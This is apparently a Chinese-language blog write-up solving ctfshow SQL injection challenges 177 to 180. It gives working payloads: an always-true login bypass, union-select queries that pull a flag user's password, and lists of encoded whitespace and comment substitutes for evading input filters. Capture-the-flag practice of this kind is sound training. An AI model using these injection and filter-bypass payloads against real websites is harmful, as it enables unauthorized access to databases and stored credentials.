前言:继续做ctfshow的题了,本次为sql注入专题,从ctfshow web 177开始
ctfshow web 177
对空格,--+
进行了过滤,注释符要换成#
的url编码 %23
使用万能密码可以绕过
1'or'1'='1';%23
也可也使用/**/
对空格进行绕过,进行联合查询
-1'union/**/select/**/1,2,password/**/from/**/ctfshow_user/**/where/**/username='flag';%23
记得吗,在之前的命令执行博客中,/**/
也可也在bash中绕过空格
ctfshow web 178
万能密码直接秒了
1'or'1'='1';%23
相比上一题还过滤掉了*
但还存在其他的空格过滤方式
%0a
%0c
%09
/*!*/
%0b
%0d
我们选取可以绕过过滤的对上一题的payload进行替换即可
ctfshow web 179
万能密码照样秒了
1'or'1'='1';%23
通过实际测试 %0a
%0b
%09
都被过滤了,直接%0c
绕过
ctfshow web 180
这题万能密码终于给过滤了,
但给%23
给过滤了,用--%0c-
来替代即可
-1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%0cwhere%0cusername='flag';--%0c-